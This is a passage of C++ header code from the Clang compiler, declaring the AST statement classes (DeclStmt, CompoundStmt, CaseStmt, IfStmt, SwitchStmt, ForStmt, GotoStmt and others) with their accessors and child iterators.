/// dumpPretty/printPretty - These two methods do a "pretty print" of the AST
/// back to its original source language syntax.
void dumpPretty(const ASTContext &Context) const;
void printPretty(raw_ostream &OS, PrinterHelper *Helper,
const PrintingPolicy &Policy, unsigned Indentation = 0,
const ASTContext *Context = nullptr) const;
/// viewAST - Visualize an AST rooted at this Stmt* using GraphViz. Only
/// works on systems with GraphViz (Mac OS X) or dot+gv installed.
void viewAST() const;
/// Skip past any implicit AST nodes which might surround this
/// statement, such as ExprWithCleanups or ImplicitCastExpr nodes.
Stmt *IgnoreImplicit();
const Stmt *IgnoreImplicit() const {
return const_cast<Stmt *>(this)->IgnoreImplicit();
}
/// \brief Skip no-op (attributed, compound) container stmts and skip captured
/// stmt at the top, if \a IgnoreCaptured is true.
Stmt *IgnoreContainers(bool IgnoreCaptured = false);
const Stmt *IgnoreContainers(bool IgnoreCaptured = false) const {
return const_cast<Stmt *>(this)->IgnoreContainers(IgnoreCaptured);
}
const Stmt *stripLabelLikeStatements() const;
Stmt *stripLabelLikeStatements() {
return const_cast<Stmt*>(
const_cast<const Stmt*>(this)->stripLabelLikeStatements());
}
/// Child Iterators: All subclasses must implement 'children'
/// to permit easy iteration over the substatements/subexpessions of an
/// AST node. This permits easy iteration over all nodes in the AST.
using child_iterator = StmtIterator;
using const_child_iterator = ConstStmtIterator;
using child_range = llvm::iterator_range<child_iterator>;
using const_child_range = llvm::iterator_range<const_child_iterator>;
child_range children();
const_child_range children() const {
auto Children = const_cast<Stmt *>(this)->children();
return const_child_range(Children.begin(), Children.end());
}
child_iterator child_begin() { return children().begin(); }
child_iterator child_end() { return children().end(); }
const_child_iterator child_begin() const { return children().begin(); }
const_child_iterator child_end() const { return children().end(); }
/// \brief Produce a unique representation of the given statement.
///
/// \param ID once the profiling operation is complete, will contain
/// the unique representation of the given statement.
///
/// \param Context the AST context in which the statement resides
///
/// \param Canonical whether the profile should be based on the canonical
/// representation of this statement (e.g., where non-type template
/// parameters are identified by index/level rather than their
/// declaration pointers) or the exact representation of the statement as
/// written in the source.
void Profile(llvm::FoldingSetNodeID &ID, const ASTContext &Context,
bool Canonical) const;
/// \brief Calculate a unique representation for a statement that is
/// stable across compiler invocations.
///
/// \param ID profile information will be stored in ID.
///
/// \param Hash an ODRHash object which will be called where pointers would
/// have been used in the Profile function.
void ProcessODRHash(llvm::FoldingSetNodeID &ID, ODRHash& Hash) const;
};
/// DeclStmt - Adaptor class for mixing declarations with statements and
/// expressions. For example, CompoundStmt mixes statements, expressions
/// and declarations (variables, types). Another example is ForStmt, where
/// the first statement can be an expression or a declaration.
class DeclStmt : public Stmt {
DeclGroupRef DG;
SourceLocation StartLoc, EndLoc;
public:
DeclStmt(DeclGroupRef dg, SourceLocation startLoc, SourceLocation endLoc)
: Stmt(DeclStmtClass), DG(dg), StartLoc(startLoc), EndLoc(endLoc) {}
/// \brief Build an empty declaration statement.
explicit DeclStmt(EmptyShell Empty) : Stmt(DeclStmtClass, Empty) {}
/// isSingleDecl - This method returns true if this DeclStmt refers
/// to a single Decl.
bool isSingleDecl() const {
return DG.isSingleDecl();
}
const Decl *getSingleDecl() const { return DG.getSingleDecl(); }
Decl *getSingleDecl() { return DG.getSingleDecl(); }
const DeclGroupRef getDeclGroup() const { return DG; }
DeclGroupRef getDeclGroup() { return DG; }
void setDeclGroup(DeclGroupRef DGR) { DG = DGR; }
SourceLocation getStartLoc() const { return StartLoc; }
void setStartLoc(SourceLocation L) { StartLoc = L; }
SourceLocation getEndLoc() const { return EndLoc; }
void setEndLoc(SourceLocation L) { EndLoc = L; }
SourceLocation getLocStart() const LLVM_READONLY { return StartLoc; }
SourceLocation getLocEnd() const LLVM_READONLY { return EndLoc; }
static bool classof(const Stmt *T) {
return T->getStmtClass() == DeclStmtClass;
}
// Iterators over subexpressions.
child_range children() {
return child_range(child_iterator(DG.begin(), DG.end()),
child_iterator(DG.end(), DG.end()));
}
using decl_iterator = DeclGroupRef::iterator;
using const_decl_iterator = DeclGroupRef::const_iterator;
using decl_range = llvm::iterator_range<decl_iterator>;
using decl_const_range = llvm::iterator_range<const_decl_iterator>;
decl_range decls() { return decl_range(decl_begin(), decl_end()); }
decl_const_range decls() const {
return decl_const_range(decl_begin(), decl_end());
}
decl_iterator decl_begin() { return DG.begin(); }
decl_iterator decl_end() { return DG.end(); }
const_decl_iterator decl_begin() const { return DG.begin(); }
const_decl_iterator decl_end() const { return DG.end(); }
using reverse_decl_iterator = std::reverse_iterator<decl_iterator>;
reverse_decl_iterator decl_rbegin() {
return reverse_decl_iterator(decl_end());
}
reverse_decl_iterator decl_rend() {
return reverse_decl_iterator(decl_begin());
}
};
/// NullStmt - This is the null statement ";": C99 6.8.3p3.
///
class NullStmt : public Stmt {
SourceLocation SemiLoc;
/// \brief True if the null statement was preceded by an empty macro, e.g:
/// @code
/// #define CALL(x)
/// CALL(0);
/// @endcode
bool HasLeadingEmptyMacro = false;
public:
friend class ASTStmtReader;
friend class ASTStmtWriter;
NullStmt(SourceLocation L, bool hasLeadingEmptyMacro = false)
: Stmt(NullStmtClass), SemiLoc(L),
HasLeadingEmptyMacro(hasLeadingEmptyMacro) {}
/// \brief Build an empty null statement.
explicit NullStmt(EmptyShell Empty) : Stmt(NullStmtClass, Empty) {}
SourceLocation getSemiLoc() const { return SemiLoc; }
void setSemiLoc(SourceLocation L) { SemiLoc = L; }
bool hasLeadingEmptyMacro() const { return HasLeadingEmptyMacro; }
SourceLocation getLocStart() const LLVM_READONLY { return SemiLoc; }
SourceLocation getLocEnd() const LLVM_READONLY { return SemiLoc; }
static bool classof(const Stmt *T) {
return T->getStmtClass() == NullStmtClass;
}
child_range children() {
return child_range(child_iterator(), child_iterator());
}
};
/// CompoundStmt - This represents a group of statements like { stmt stmt }.
class CompoundStmt final : public Stmt,
private llvm::TrailingObjects<CompoundStmt, Stmt *> {
friend class ASTStmtReader;
friend TrailingObjects;
SourceLocation LBraceLoc, RBraceLoc;
CompoundStmt(ArrayRef<Stmt *> Stmts, SourceLocation LB, SourceLocation RB);
explicit CompoundStmt(EmptyShell Empty) : Stmt(CompoundStmtClass, Empty) {}
void setStmts(ArrayRef<Stmt *> Stmts);
public:
static CompoundStmt *Create(const ASTContext &C, ArrayRef<Stmt *> Stmts,
SourceLocation LB, SourceLocation RB);
// \brief Build an empty compound statement with a location.
explicit CompoundStmt(SourceLocation Loc)
: Stmt(CompoundStmtClass), LBraceLoc(Loc), RBraceLoc(Loc) {
CompoundStmtBits.NumStmts = 0;
}
// \brief Build an empty compound statement.
static CompoundStmt *CreateEmpty(const ASTContext &C, unsigned NumStmts);
bool body_empty() const { return CompoundStmtBits.NumStmts == 0; }
unsigned size() const { return CompoundStmtBits.NumStmts; }
using body_iterator = Stmt **;
using body_range = llvm::iterator_range<body_iterator>;
body_range body() { return body_range(body_begin(), body_end()); }
body_iterator body_begin() { return getTrailingObjects<Stmt *>(); }
body_iterator body_end() { return body_begin() + size(); }
Stmt *body_front() { return !body_empty() ? body_begin()[0] : nullptr; }
Stmt *body_back() {
return !body_empty() ? body_begin()[size() - 1] : nullptr;
}
void setLastStmt(Stmt *S) {
assert(!body_empty() && "setLastStmt");
body_begin()[size() - 1] = S;
}
using const_body_iterator = Stmt* const *;
using body_const_range = llvm::iterator_range<const_body_iterator>;
body_const_range body() const {
return body_const_range(body_begin(), body_end());
}
const_body_iterator body_begin() const {
return getTrailingObjects<Stmt *>();
}
const_body_iterator body_end() const { return body_begin() + size(); }
const Stmt *body_front() const {
return !body_empty() ? body_begin()[0] : nullptr;
}
const Stmt *body_back() const {
return !body_empty() ? body_begin()[size() - 1] : nullptr;
}
using reverse_body_iterator = std::reverse_iterator<body_iterator>;
reverse_body_iterator body_rbegin() {
return reverse_body_iterator(body_end());
}
reverse_body_iterator body_rend() {
return reverse_body_iterator(body_begin());
}
using const_reverse_body_iterator =
std::reverse_iterator<const_body_iterator>;
const_reverse_body_iterator body_rbegin() const {
return const_reverse_body_iterator(body_end());
}
const_reverse_body_iterator body_rend() const {
return const_reverse_body_iterator(body_begin());
}
SourceLocation getLocStart() const LLVM_READONLY { return LBraceLoc; }
SourceLocation getLocEnd() const LLVM_READONLY { return RBraceLoc; }
SourceLocation getLBracLoc() const { return LBraceLoc; }
SourceLocation getRBracLoc() const { return RBraceLoc; }
static bool classof(const Stmt *T) {
return T->getStmtClass() == CompoundStmtClass;
}
// Iterators
child_range children() { return child_range(body_begin(), body_end()); }
const_child_range children() const {
return const_child_range(body_begin(), body_end());
}
};
// SwitchCase is the base class for CaseStmt and DefaultStmt,
class SwitchCase : public Stmt {
protected:
// A pointer to the following CaseStmt or DefaultStmt class,
// used by SwitchStmt.
SwitchCase *NextSwitchCase = nullptr;
SourceLocation KeywordLoc;
SourceLocation ColonLoc;
SwitchCase(StmtClass SC, SourceLocation KWLoc, SourceLocation ColonLoc)
: Stmt(SC), KeywordLoc(KWLoc), ColonLoc(ColonLoc) {}
SwitchCase(StmtClass SC, EmptyShell) : Stmt(SC) {}
public:
const SwitchCase *getNextSwitchCase() const { return NextSwitchCase; }
SwitchCase *getNextSwitchCase() { return NextSwitchCase; }
void setNextSwitchCase(SwitchCase *SC) { NextSwitchCase = SC; }
SourceLocation getKeywordLoc() const { return KeywordLoc; }
void setKeywordLoc(SourceLocation L) { KeywordLoc = L; }
SourceLocation getColonLoc() const { return ColonLoc; }
void setColonLoc(SourceLocation L) { ColonLoc = L; }
Stmt *getSubStmt();
const Stmt *getSubStmt() const {
return const_cast<SwitchCase*>(this)->getSubStmt();
}
SourceLocation getLocStart() const LLVM_READONLY { return KeywordLoc; }
SourceLocation getLocEnd() const LLVM_READONLY;
static bool classof(const Stmt *T) {
return T->getStmtClass() == CaseStmtClass ||
T->getStmtClass() == DefaultStmtClass;
}
};
class CaseStmt : public SwitchCase {
SourceLocation EllipsisLoc;
enum { LHS, RHS, SUBSTMT, END_EXPR };
Stmt* SubExprs[END_EXPR]; // The expression for the RHS is Non-null for
// GNU "case 1 ... 4" extension
public:
CaseStmt(Expr *lhs, Expr *rhs, SourceLocation caseLoc,
SourceLocation ellipsisLoc, SourceLocation colonLoc)
: SwitchCase(CaseStmtClass, caseLoc, colonLoc) {
SubExprs[SUBSTMT] = nullptr;
SubExprs[LHS] = reinterpret_cast<Stmt*>(lhs);
SubExprs[RHS] = reinterpret_cast<Stmt*>(rhs);
EllipsisLoc = ellipsisLoc;
}
/// \brief Build an empty switch case statement.
explicit CaseStmt(EmptyShell Empty) : SwitchCase(CaseStmtClass, Empty) {}
SourceLocation getCaseLoc() const { return KeywordLoc; }
void setCaseLoc(SourceLocation L) { KeywordLoc = L; }
SourceLocation getEllipsisLoc() const { return EllipsisLoc; }
void setEllipsisLoc(SourceLocation L) { EllipsisLoc = L; }
SourceLocation getColonLoc() const { return ColonLoc; }
void setColonLoc(SourceLocation L) { ColonLoc = L; }
Expr *getLHS() { return reinterpret_cast<Expr*>(SubExprs[LHS]); }
Expr *getRHS() { return reinterpret_cast<Expr*>(SubExprs[RHS]); }
Stmt *getSubStmt() { return SubExprs[SUBSTMT]; }
const Expr *getLHS() const {
return reinterpret_cast<const Expr*>(SubExprs[LHS]);
}
const Expr *getRHS() const {
return reinterpret_cast<const Expr*>(SubExprs[RHS]);
}
const Stmt *getSubStmt() const { return SubExprs[SUBSTMT]; }
void setSubStmt(Stmt *S) { SubExprs[SUBSTMT] = S; }
void setLHS(Expr *Val) { SubExprs[LHS] = reinterpret_cast<Stmt*>(Val); }
void setRHS(Expr *Val) { SubExprs[RHS] = reinterpret_cast<Stmt*>(Val); }
SourceLocation getLocStart() const LLVM_READONLY { return KeywordLoc; }
SourceLocation getLocEnd() const LLVM_READONLY {
// Handle deeply nested case statements with iteration instead of recursion.
const CaseStmt *CS = this;
while (const CaseStmt *CS2 = dyn_cast<CaseStmt>(CS->getSubStmt()))
CS = CS2;
return CS->getSubStmt()->getLocEnd();
}
static bool classof(const Stmt *T) {
return T->getStmtClass() == CaseStmtClass;
}
// Iterators
child_range children() {
return child_range(&SubExprs[0], &SubExprs[END_EXPR]);
}
};
class DefaultStmt : public SwitchCase {
Stmt* SubStmt;
public:
DefaultStmt(SourceLocation DL, SourceLocation CL, Stmt *substmt) :
SwitchCase(DefaultStmtClass, DL, CL), SubStmt(substmt) {}
/// \brief Build an empty default statement.
explicit DefaultStmt(EmptyShell Empty)
: SwitchCase(DefaultStmtClass, Empty) {}
Stmt *getSubStmt() { return SubStmt; }
const Stmt *getSubStmt() const { return SubStmt; }
void setSubStmt(Stmt *S) { SubStmt = S; }
SourceLocation getDefaultLoc() const { return KeywordLoc; }
void setDefaultLoc(SourceLocation L) { KeywordLoc = L; }
SourceLocation getColonLoc() const { return ColonLoc; }
void setColonLoc(SourceLocation L) { ColonLoc = L; }
SourceLocation getLocStart() const LLVM_READONLY { return KeywordLoc; }
SourceLocation getLocEnd() const LLVM_READONLY { return SubStmt->getLocEnd();}
static bool classof(const Stmt *T) {
return T->getStmtClass() == DefaultStmtClass;
}
// Iterators
child_range children() { return child_range(&SubStmt, &SubStmt+1); }
};
inline SourceLocation SwitchCase::getLocEnd() const {
if (const CaseStmt *CS = dyn_cast<CaseStmt>(this))
return CS->getLocEnd();
return cast<DefaultStmt>(this)->getLocEnd();
}
/// LabelStmt - Represents a label, which has a substatement. For example:
/// foo: return;
class LabelStmt : public Stmt {
SourceLocation IdentLoc;
LabelDecl *TheDecl;
Stmt *SubStmt;
public:
LabelStmt(SourceLocation IL, LabelDecl *D, Stmt *substmt)
: Stmt(LabelStmtClass), IdentLoc(IL), TheDecl(D), SubStmt(substmt) {
static_assert(sizeof(LabelStmt) ==
2 * sizeof(SourceLocation) + 2 * sizeof(void *),
"LabelStmt too big");
}
// \brief Build an empty label statement.
explicit LabelStmt(EmptyShell Empty) : Stmt(LabelStmtClass, Empty) {}
SourceLocation getIdentLoc() const { return IdentLoc; }
LabelDecl *getDecl() const { return TheDecl; }
void setDecl(LabelDecl *D) { TheDecl = D; }
const char *getName() const;
Stmt *getSubStmt() { return SubStmt; }
const Stmt *getSubStmt() const { return SubStmt; }
void setIdentLoc(SourceLocation L) { IdentLoc = L; }
void setSubStmt(Stmt *SS) { SubStmt = SS; }
SourceLocation getLocStart() const LLVM_READONLY { return IdentLoc; }
SourceLocation getLocEnd() const LLVM_READONLY { return SubStmt->getLocEnd();}
child_range children() { return child_range(&SubStmt, &SubStmt+1); }
static bool classof(const Stmt *T) {
return T->getStmtClass() == LabelStmtClass;
}
};
/// \brief Represents an attribute applied to a statement.
///
/// Represents an attribute applied to a statement. For example:
/// [[omp::for(...)]] for (...) { ... }
class AttributedStmt final
: public Stmt,
private llvm::TrailingObjects<AttributedStmt, const Attr *> {
friend class ASTStmtReader;
friend TrailingObjects;
Stmt *SubStmt;
SourceLocation AttrLoc;
unsigned NumAttrs;
AttributedStmt(SourceLocation Loc, ArrayRef<const Attr*> Attrs, Stmt *SubStmt)
: Stmt(AttributedStmtClass), SubStmt(SubStmt), AttrLoc(Loc),
NumAttrs(Attrs.size()) {
std::copy(Attrs.begin(), Attrs.end(), getAttrArrayPtr());
}
explicit AttributedStmt(EmptyShell Empty, unsigned NumAttrs)
: Stmt(AttributedStmtClass, Empty), NumAttrs(NumAttrs) {
std::fill_n(getAttrArrayPtr(), NumAttrs, nullptr);
}
const Attr *const *getAttrArrayPtr() const {
return getTrailingObjects<const Attr *>();
}
const Attr **getAttrArrayPtr() { return getTrailingObjects<const Attr *>(); }
public:
static AttributedStmt *Create(const ASTContext &C, SourceLocation Loc,
ArrayRef<const Attr*> Attrs, Stmt *SubStmt);
// \brief Build an empty attributed statement.
static AttributedStmt *CreateEmpty(const ASTContext &C, unsigned NumAttrs);
SourceLocation getAttrLoc() const { return AttrLoc; }
ArrayRef<const Attr*> getAttrs() const {
return llvm::makeArrayRef(getAttrArrayPtr(), NumAttrs);
}
Stmt *getSubStmt() { return SubStmt; }
const Stmt *getSubStmt() const { return SubStmt; }
void setSubStmt( Stmt*stmt) { SubStmt = stmt; }
SourceLocation getLocStart() const LLVM_READONLY { return AttrLoc; }
SourceLocation getLocEnd() const LLVM_READONLY { return SubStmt->getLocEnd();}
child_range children() { return child_range(&SubStmt, &SubStmt + 1); }
static bool classof(const Stmt *T) {
return T->getStmtClass() == AttributedStmtClass;
}
};
/// IfStmt - This represents an if/then/else.
class IfStmt : public Stmt {
enum { INIT, VAR, COND, THEN, ELSE, END_EXPR };
Stmt* SubExprs[END_EXPR];
SourceLocation IfLoc;
SourceLocation ElseLoc;
public:
IfStmt(const ASTContext &C, SourceLocation IL,
bool IsConstexpr, Stmt *init, VarDecl *var, Expr *cond,
Stmt *then, SourceLocation EL = SourceLocation(),
Stmt *elsev = nullptr);
/// \brief Build an empty if/then/else statement
explicit IfStmt(EmptyShell Empty) : Stmt(IfStmtClass, Empty) {}
/// \brief Retrieve the variable declared in this "if" statement, if any.
///
/// In the following example, "x" is the condition variable.
/// \code
/// if (int x = foo()) {
/// printf("x is %d", x);
/// }
/// \endcode
VarDecl *getConditionVariable() const;
void setConditionVariable(const ASTContext &C, VarDecl *V);
/// If this IfStmt has a condition variable, return the faux DeclStmt
/// associated with the creation of that condition variable.
const DeclStmt *getConditionVariableDeclStmt() const {
return reinterpret_cast<DeclStmt*>(SubExprs[VAR]);
}
Stmt *getInit() { return SubExprs[INIT]; }
const Stmt *getInit() const { return SubExprs[INIT]; }
void setInit(Stmt *S) { SubExprs[INIT] = S; }
const Expr *getCond() const { return reinterpret_cast<Expr*>(SubExprs[COND]);}
void setCond(Expr *E) { SubExprs[COND] = reinterpret_cast<Stmt *>(E); }
const Stmt *getThen() const { return SubExprs[THEN]; }
void setThen(Stmt *S) { SubExprs[THEN] = S; }
const Stmt *getElse() const { return SubExprs[ELSE]; }
void setElse(Stmt *S) { SubExprs[ELSE] = S; }
Expr *getCond() { return reinterpret_cast<Expr*>(SubExprs[COND]); }
Stmt *getThen() { return SubExprs[THEN]; }
Stmt *getElse() { return SubExprs[ELSE]; }
SourceLocation getIfLoc() const { return IfLoc; }
void setIfLoc(SourceLocation L) { IfLoc = L; }
SourceLocation getElseLoc() const { return ElseLoc; }
void setElseLoc(SourceLocation L) { ElseLoc = L; }
bool isConstexpr() const { return IfStmtBits.IsConstexpr; }
void setConstexpr(bool C) { IfStmtBits.IsConstexpr = C; }
bool isObjCAvailabilityCheck() const;
SourceLocation getLocStart() const LLVM_READONLY { return IfLoc; }
SourceLocation getLocEnd() const LLVM_READONLY {
if (SubExprs[ELSE])
return SubExprs[ELSE]->getLocEnd();
else
return SubExprs[THEN]->getLocEnd();
}
// Iterators over subexpressions. The iterators will include iterating
// over the initialization expression referenced by the condition variable.
child_range children() {
return child_range(&SubExprs[0], &SubExprs[0]+END_EXPR);
}
static bool classof(const Stmt *T) {
return T->getStmtClass() == IfStmtClass;
}
};
/// SwitchStmt - This represents a 'switch' stmt.
class SwitchStmt : public Stmt {
SourceLocation SwitchLoc;
enum { INIT, VAR, COND, BODY, END_EXPR };
Stmt* SubExprs[END_EXPR];
// This points to a linked list of case and default statements and, if the
// SwitchStmt is a switch on an enum value, records whether all the enum
// values were covered by CaseStmts. The coverage information value is meant
// to be a hint for possible clients.
llvm::PointerIntPair<SwitchCase *, 1, bool> FirstCase;
public:
SwitchStmt(const ASTContext &C, Stmt *Init, VarDecl *Var, Expr *cond);
/// \brief Build a empty switch statement.
explicit SwitchStmt(EmptyShell Empty) : Stmt(SwitchStmtClass, Empty) {}
/// \brief Retrieve the variable declared in this "switch" statement, if any.
///
/// In the following example, "x" is the condition variable.
/// \code
/// switch (int x = foo()) {
/// case 0: break;
/// // ...
/// }
/// \endcode
VarDecl *getConditionVariable() const;
void setConditionVariable(const ASTContext &C, VarDecl *V);
/// If this SwitchStmt has a condition variable, return the faux DeclStmt
/// associated with the creation of that condition variable.
const DeclStmt *getConditionVariableDeclStmt() const {
return reinterpret_cast<DeclStmt*>(SubExprs[VAR]);
}
Stmt *getInit() { return SubExprs[INIT]; }
const Stmt *getInit() const { return SubExprs[INIT]; }
void setInit(Stmt *S) { SubExprs[INIT] = S; }
const Expr *getCond() const { return reinterpret_cast<Expr*>(SubExprs[COND]);}
const Stmt *getBody() const { return SubExprs[BODY]; }
const SwitchCase *getSwitchCaseList() const { return FirstCase.getPointer(); }
Expr *getCond() { return reinterpret_cast<Expr*>(SubExprs[COND]);}
void setCond(Expr *E) { SubExprs[COND] = reinterpret_cast<Stmt *>(E); }
Stmt *getBody() { return SubExprs[BODY]; }
void setBody(Stmt *S) { SubExprs[BODY] = S; }
SwitchCase *getSwitchCaseList() { return FirstCase.getPointer(); }
/// \brief Set the case list for this switch statement.
void setSwitchCaseList(SwitchCase *SC) { FirstCase.setPointer(SC); }
SourceLocation getSwitchLoc() const { return SwitchLoc; }
void setSwitchLoc(SourceLocation L) { SwitchLoc = L; }
void setBody(Stmt *S, SourceLocation SL) {
SubExprs[BODY] = S;
SwitchLoc = SL;
}
void addSwitchCase(SwitchCase *SC) {
assert(!SC->getNextSwitchCase()
&& "case/default already added to a switch");
SC->setNextSwitchCase(FirstCase.getPointer());
FirstCase.setPointer(SC);
}
/// Set a flag in the SwitchStmt indicating that if the 'switch (X)' is a
/// switch over an enum value then all cases have been explicitly covered.
void setAllEnumCasesCovered() { FirstCase.setInt(true); }
/// Returns true if the SwitchStmt is a switch of an enum value and all cases
/// have been explicitly covered.
bool isAllEnumCasesCovered() const { return FirstCase.getInt(); }
SourceLocation getLocStart() const LLVM_READONLY { return SwitchLoc; }
SourceLocation getLocEnd() const LLVM_READONLY {
return SubExprs[BODY] ? SubExprs[BODY]->getLocEnd() : SubExprs[COND]->getLocEnd();
}
// Iterators
child_range children() {
return child_range(&SubExprs[0], &SubExprs[0]+END_EXPR);
}
static bool classof(const Stmt *T) {
return T->getStmtClass() == SwitchStmtClass;
}
};
/// WhileStmt - This represents a 'while' stmt.
class WhileStmt : public Stmt {
SourceLocation WhileLoc;
enum { VAR, COND, BODY, END_EXPR };
Stmt* SubExprs[END_EXPR];
public:
WhileStmt(const ASTContext &C, VarDecl *Var, Expr *cond, Stmt *body,
SourceLocation WL);
/// \brief Build an empty while statement.
explicit WhileStmt(EmptyShell Empty) : Stmt(WhileStmtClass, Empty) {}
/// \brief Retrieve the variable declared in this "while" statement, if any.
///
/// In the following example, "x" is the condition variable.
/// \code
/// while (int x = random()) {
/// // ...
/// }
/// \endcode
VarDecl *getConditionVariable() const;
void setConditionVariable(const ASTContext &C, VarDecl *V);
/// If this WhileStmt has a condition variable, return the faux DeclStmt
/// associated with the creation of that condition variable.
const DeclStmt *getConditionVariableDeclStmt() const {
return reinterpret_cast<DeclStmt*>(SubExprs[VAR]);
}
Expr *getCond() { return reinterpret_cast<Expr*>(SubExprs[COND]); }
const Expr *getCond() const { return reinterpret_cast<Expr*>(SubExprs[COND]);}
void setCond(Expr *E) { SubExprs[COND] = reinterpret_cast<Stmt*>(E); }
Stmt *getBody() { return SubExprs[BODY]; }
const Stmt *getBody() const { return SubExprs[BODY]; }
void setBody(Stmt *S) { SubExprs[BODY] = S; }
SourceLocation getWhileLoc() const { return WhileLoc; }
void setWhileLoc(SourceLocation L) { WhileLoc = L; }
SourceLocation getLocStart() const LLVM_READONLY { return WhileLoc; }
SourceLocation getLocEnd() const LLVM_READONLY {
return SubExprs[BODY]->getLocEnd();
}
static bool classof(const Stmt *T) {
return T->getStmtClass() == WhileStmtClass;
}
// Iterators
child_range children() {
return child_range(&SubExprs[0], &SubExprs[0]+END_EXPR);
}
};
/// DoStmt - This represents a 'do/while' stmt.
class DoStmt : public Stmt {
SourceLocation DoLoc;
enum { BODY, COND, END_EXPR };
Stmt* SubExprs[END_EXPR];
SourceLocation WhileLoc;
SourceLocation RParenLoc; // Location of final ')' in do stmt condition.
public:
DoStmt(Stmt *body, Expr *cond, SourceLocation DL, SourceLocation WL,
SourceLocation RP)
: Stmt(DoStmtClass), DoLoc(DL), WhileLoc(WL), RParenLoc(RP) {
SubExprs[COND] = reinterpret_cast<Stmt*>(cond);
SubExprs[BODY] = body;
}
/// \brief Build an empty do-while statement.
explicit DoStmt(EmptyShell Empty) : Stmt(DoStmtClass, Empty) {}
Expr *getCond() { return reinterpret_cast<Expr*>(SubExprs[COND]); }
const Expr *getCond() const { return reinterpret_cast<Expr*>(SubExprs[COND]);}
void setCond(Expr *E) { SubExprs[COND] = reinterpret_cast<Stmt*>(E); }
Stmt *getBody() { return SubExprs[BODY]; }
const Stmt *getBody() const { return SubExprs[BODY]; }
void setBody(Stmt *S) { SubExprs[BODY] = S; }
SourceLocation getDoLoc() const { return DoLoc; }
void setDoLoc(SourceLocation L) { DoLoc = L; }
SourceLocation getWhileLoc() const { return WhileLoc; }
void setWhileLoc(SourceLocation L) { WhileLoc = L; }
SourceLocation getRParenLoc() const { return RParenLoc; }
void setRParenLoc(SourceLocation L) { RParenLoc = L; }
SourceLocation getLocStart() const LLVM_READONLY { return DoLoc; }
SourceLocation getLocEnd() const LLVM_READONLY { return RParenLoc; }
static bool classof(const Stmt *T) {
return T->getStmtClass() == DoStmtClass;
}
// Iterators
child_range children() {
return child_range(&SubExprs[0], &SubExprs[0]+END_EXPR);
}
};
/// ForStmt - This represents a 'for (init;cond;inc)' stmt. Note that any of
/// the init/cond/inc parts of the ForStmt will be null if they were not
/// specified in the source.
class ForStmt : public Stmt {
SourceLocation ForLoc;
enum { INIT, CONDVAR, COND, INC, BODY, END_EXPR };
Stmt* SubExprs[END_EXPR]; // SubExprs[INIT] is an expression or declstmt.
SourceLocation LParenLoc, RParenLoc;
public:
ForStmt(const ASTContext &C, Stmt *Init, Expr *Cond, VarDecl *condVar,
Expr *Inc, Stmt *Body, SourceLocation FL, SourceLocation LP,
SourceLocation RP);
/// \brief Build an empty for statement.
explicit ForStmt(EmptyShell Empty) : Stmt(ForStmtClass, Empty) {}
Stmt *getInit() { return SubExprs[INIT]; }
/// \brief Retrieve the variable declared in this "for" statement, if any.
///
/// In the following example, "y" is the condition variable.
/// \code
/// for (int x = random(); int y = mangle(x); ++x) {
/// // ...
/// }
/// \endcode
VarDecl *getConditionVariable() const;
void setConditionVariable(const ASTContext &C, VarDecl *V);
/// If this ForStmt has a condition variable, return the faux DeclStmt
/// associated with the creation of that condition variable.
const DeclStmt *getConditionVariableDeclStmt() const {
return reinterpret_cast<DeclStmt*>(SubExprs[CONDVAR]);
}
Expr *getCond() { return reinterpret_cast<Expr*>(SubExprs[COND]); }
Expr *getInc() { return reinterpret_cast<Expr*>(SubExprs[INC]); }
Stmt *getBody() { return SubExprs[BODY]; }
const Stmt *getInit() const { return SubExprs[INIT]; }
const Expr *getCond() const { return reinterpret_cast<Expr*>(SubExprs[COND]);}
const Expr *getInc() const { return reinterpret_cast<Expr*>(SubExprs[INC]); }
const Stmt *getBody() const { return SubExprs[BODY]; }
void setInit(Stmt *S) { SubExprs[INIT] = S; }
void setCond(Expr *E) { SubExprs[COND] = reinterpret_cast<Stmt*>(E); }
void setInc(Expr *E) { SubExprs[INC] = reinterpret_cast<Stmt*>(E); }
void setBody(Stmt *S) { SubExprs[BODY] = S; }
SourceLocation getForLoc() const { return ForLoc; }
void setForLoc(SourceLocation L) { ForLoc = L; }
SourceLocation getLParenLoc() const { return LParenLoc; }
void setLParenLoc(SourceLocation L) { LParenLoc = L; }
SourceLocation getRParenLoc() const { return RParenLoc; }
void setRParenLoc(SourceLocation L) { RParenLoc = L; }
SourceLocation getLocStart() const LLVM_READONLY { return ForLoc; }
SourceLocation getLocEnd() const LLVM_READONLY {
return SubExprs[BODY]->getLocEnd();
}
static bool classof(const Stmt *T) {
return T->getStmtClass() == ForStmtClass;
}
// Iterators
child_range children() {
return child_range(&SubExprs[0], &SubExprs[0]+END_EXPR);
}
};
/// GotoStmt - This represents a direct goto.
class GotoStmt : public Stmt {
LabelDecl *Label;
SourceLocation GotoLoc;
SourceLocation LabelLoc;
public:
GotoStmt(LabelDecl *label, SourceLocation GL, SourceLocation LL)
: Stmt(GotoStmtClass), Label(label), GotoLoc(GL), LabelLoc(LL) {}
/// \brief Build an empty goto statement.
explicit GotoStmt(EmptyShell Empty) : Stmt(GotoStmtClass, Empty) {}
LabelDecl *getLabel() const { return Label; }
void setLabel(LabelDecl *D) { Label = D; }
SourceLocation getGotoLoc() const { return GotoLoc; }
void setGotoLoc(SourceLocation L) { GotoLoc = L; }
SourceLocation getLabelLoc() const { return LabelLoc; }
void setLabelLoc(SourceLocation L) { LabelLoc = L; }
SourceLocation getLocStart() const LLVM_READONLY { return GotoLoc; }
SourceLocation getLocEnd() const LLVM_READONLY { return LabelLoc; }
static bool classof(const Stmt *T) {
return T->getStmtClass() == GotoStmtClass;
}
// Iterators
child_range children() {
return child_range(child_iterator(), child_iterator());
}
};
/// IndirectGotoStmt - This represents an indirect goto.
class IndirectGotoStmt : public Stmt {
SourceLocation GotoLoc;
SourceLocation StarLoc;
Stmt *Target;
public:
IndirectGotoStmt(SourceLocation gotoLoc, SourceLocation starLoc,
Expr *target)
: Stmt(IndirectGotoStmtClass), GotoLoc(gotoLoc), StarLoc(starLoc),
Target((Stmt*)target) {}
/// \brief Build an empty indirect goto statement.
explicit IndirectGotoStmt(EmptyShell Empty)
: Stmt(IndirectGotoStmtClass, Empty) {}
void setGotoLoc(SourceLocation L) { GotoLoc = L; }
SourceLocation getGotoLoc() const { return GotoLoc; }
void setStarLoc(SourceLocation L) { StarLoc = L; }
SourceLocation getStarLoc() const { return StarLoc; }
Expr *getTarget() { return reinterpret_cast<Expr*>(Target); }
const Expr *getTarget() const {return reinterpret_cast<const Expr*>(Target);}
void setTarget(Expr *E) { Target = reinterpret_cast<Stmt*>(E); }
